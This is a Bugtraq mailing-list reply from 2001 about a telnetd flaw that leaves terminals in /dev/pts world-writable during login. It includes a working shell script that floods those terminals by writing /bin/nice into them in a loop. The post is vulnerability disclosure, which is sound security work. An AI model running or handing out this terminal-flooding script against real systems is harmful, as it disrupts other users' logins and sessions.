Bugtraq mailing list archives
Re: Securax Advisory 13
From: teleh0r <teleh0r () DOGLOVER COM>
Date: Wed, 3 Jan 2001 06:35:48 +0100
I wrote a shell script which would flood the terminal of a user trying to log in a long time ago - it was placed on my website and someone called: "c0sa_n0stra", mailed me and asked me to explain how it worked and then he was kind enough to send it to packetstorm, adding his handle in the process (and a ascii cow). (http://packetstorm.securify.com/DoS/m000h.sh) The problem is the way that the telnet daemon assigns a new user a terminal - when a user is telling the telnetd who he is, and what his password is, his terminal will be awaiting in /dev/pts/ and writable by anyone. As soon as he has logged in, it will not. It is still possible for him to log in though, even if a binary is cat'ed to the terminal. (but as said by Fyodor, it may mess-up his terminal) sshd/rshd/rlogind do not behave this way - there will be no writable terminal in /dev/pts/ while the authentication is taking place. The below script has been tested on Redhat 6.1 and 6.2. ---- #!/bin/sh TTYDIR=/dev/pts NONSENSE=/bin/nice MYTTY=`tty` # To prevent flooding of one's own TTY while :; do for i in $TTYDIR/* ; do if [ -w $i -a -c $i -a $i != $MYTTY ]; then cat $NONSENSE > $i fi done done unset i ---- Sincerely yours, teleh0r -- To avoid criticism, do nothing, say nothing, be nothing. -- Elbert Hubbard
Current thread:
- Securax Advisory 13 incubus (Jan 02)
- Re: Securax Advisory 13 Fyodor (Jan 02)
- Re: Securax Advisory 13 Michal Zalewski (Jan 02)
- Re: Securax Advisory 13 Arturo Busleiman (Jan 03)
- <Possible follow-ups>
- Re: Securax Advisory 13 teleh0r (Jan 03)
- Re: Securax Advisory 13 Jarno Huuskonen (Jan 03)